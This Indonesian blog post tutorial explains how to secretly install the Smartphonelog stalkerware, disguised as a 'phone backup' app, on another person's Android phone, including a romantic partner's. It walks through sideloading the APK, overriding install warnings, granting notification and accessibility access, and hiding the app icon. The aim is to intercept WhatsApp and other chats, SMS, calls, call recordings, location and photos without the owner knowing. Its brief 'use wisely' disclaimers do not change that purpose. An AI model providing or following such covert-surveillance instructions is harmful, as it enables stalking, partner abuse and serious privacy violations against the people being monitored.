Cara Menyadap WhatsApp Dan Sosial Media Lainnya Di Smartphone Android


Dari judul diatas mungkin anda  sudah menerka apa yang akan kami  share kali ini, Yup kami  ingin berbagi trik cara menyadap (mengetahui aktivitas) sebuah smartphone milik seseorang, tentunya yang wajib anda  ketahui bahwa kami  share tutorial ini bukan untuk melakukan tidak kejahatan, tetapi  ini cara ini baik untuk di pasang dismartphone anak untuk memantau kesehariannya di dalam smartphone yang dia gunakan, Dan tentunya bisa juga dilakukan untuk mengetahui aktivitas di smartphone kekasih anda  , seperti menyadap Chat WhatsApp dan sosial media lainnya tetapi  untuk anda  yang masih single buat apa ya ??

Apabila  hal ini dilakukan dan dipasang di smartphone kekasih anda  tentunya harus siap-siap menerima konsekuensinya loh. Apa lagi kalau anda  membaca aktivitas yang bisa membuat hati anda  hancur lebur (patah hati) tapi semoga aja itu tidak terjadi. Nah aplikasi ini dapat memantau aktivitas panggilan telepon, Sms, gallery, WA, BBM, lokasi terakhir Dan media sosial lainnya yang ada di smartphone tersebut. Kami  sih udah pernah mencobanya dan tentu apapun yang terjadi apapun yang kami  baca itu hanya sebagai referensi dan hanya menganggap sebagai buku bacaan saja tanpa memikirkan hal lainnya intinya cukup tahu saja,, karena setiap orang mempunyai  privasi yang harus dijaga dan dihargai. Oke lanjut ke aplikasi yang kami  maksud, untuk dapat menggunakan aplikasi yang bernama Smartphonelog ini anda  diharuskan mempunyai  smartphone android entah itu milik sendiri atau milik seorang yang ingin anda  sadap yaitu

Cara instal dan download apknya sebagai berikut :

1. Buka link diatas lalu anda  klik "download and instal now" akan muncul jendela pop up lalu klik "vrsr.me" bila menggunakan browser browser chrome atau browser bawaan lainnya, tetapi apbila  menggunakan uc browser cukup klik saja "download" otomatis akan mendowload apk smartphonelog dengan nama "app.apk"

2. Setelah berhasil mendownload silahkan anda  instal aplikasinya, tetapi  kalau smartphonenya ber OS marshmellow saat anda  ingin menginstal, aplikasi tersebut akan terblokir, supaya tidak gagal dalam menginstal ikuti seperti cara dibawah ini


anda  mengklik "Tetap pasang' supaya aplikasi tersebut terinstal, apabila berhasil terinstal akan ada aplikasi baru dengan gambar robot android bernama " phone backup" silahkan anda  buka aplikasi tersebut dimenu home screen smartphone anda ,

3. Selanjutnya buka dan isi atau Masukan Username, Password dan email anda ,


Ceklist yang penting saja karena apabila  anda  hanya menginginkan menyadap sms/telepon dan notification WA (aplikasi chat lainnya) jangan anda  centang kolom galery (backup foto) supaya kuota internet android target yang disadap tidak terkuras, karena apabila anda  centang, semua foto yang berada diandroid tersebut akan ikut tersadap (terupload)bila sudah, klik "Aktifkan Pemberitahuan Back Up" seperti tutorial gambar diatas. akan muncul seperti gambar dibawah ini dan silahkan anda  aktifkan "notifications service"


Klik Active Notification Service - Klik OK dan tekan tombol back pada smartphone anda , setelah back ikuti cara seperti pada gambar dibawah ini.


Centang/Ceklist kolom seperti gambar diatas apabila  anda  "setuju" dan ingin melanjutkan acara ini, klik untuk "menyimpan dan mengaktifkannya", akan muncul pop up supaya anda  mengingat username beserta password nya, lalu klik OK, otomatis aplikasi smartphone log ini akan hilang dan lenyap dari smartphone anda , selesai dan selamat anda  berhasil menginstal smartphone log silahkan kembalikan smartphone kepada pemiliknya, sekarang kini untuk memantau android (target) yang selesai di aktifkan, anda  dapat melihatnya via PC atau pun smartphone yang anda  miliki caranya :

Kembali buka browser anda  dan login dengan username beserta password yang tadi telah dibuat.


Beres logi dengan benar anda  dapat melihat segala aktivitas yang ingin anda  ketahui, seperti sms/telepon, Notification (BBM, WA dll), Galery apabila anda  aktifkan fitur galery,  Location (apabila  GPS android target aktif), Call recording dan aktivitas browsernya.


Nah untuk notifikasi aplikasi chatting seperti BBM apabila  tidak ada pemberitahuan atau tidak terlihat aktivitas Chattingnya anda  harus mengaktifkan aksebilitas langsung di smartphone target, Caranya, tentu memegang smartphone target - setting - aksebilitas - aktifkan fitur pemberitahuan aksebilitas, Atau anda  dapat mengetahui cara aktifkan aksebilitas setelah sesaat mengklik Notification/messages tetapi  aktivitas BBM belum terlihat dalam browser akan muncul "pemberitahuan cara aktifkan aksebilitas".

Apabila  cara diatas sudah beres. Tunggu beberapa saat buka kembali via browser android anda  dan notification BBM dan aplikasi chat lainnya akan muncul.

Ingat gunakan dengan bijak aplikasi yang admin share ini, jangan jadikan sebagai tindakan yang merugikan orang lain. Patut anda  ketahui aplikasi ini hanya mempunyai  masa Trial 2 (dua) hari saja (Full service) lewat dari 2 hari anda  diwajibkan membeli versi premiumnya kurang lebih $10/bulan Via Paypal.

Update Cara Sembunyikan Aplikasi :
Untuk menyembunyikan aplikasi "phone backup" setelah selesai melakukan registrasi sesuai tutorial diatas kamu harus login ke situs smartphonelog dan akan menemukan notifikasi pemberitahuan dalam bahasa inggris dengan adanya tulisan biru "HIDE THE APP ICON" klik saja tulisan biru tersebut sehingga otomatis aplikasi "phone backup" akan hilang dari smartphone target.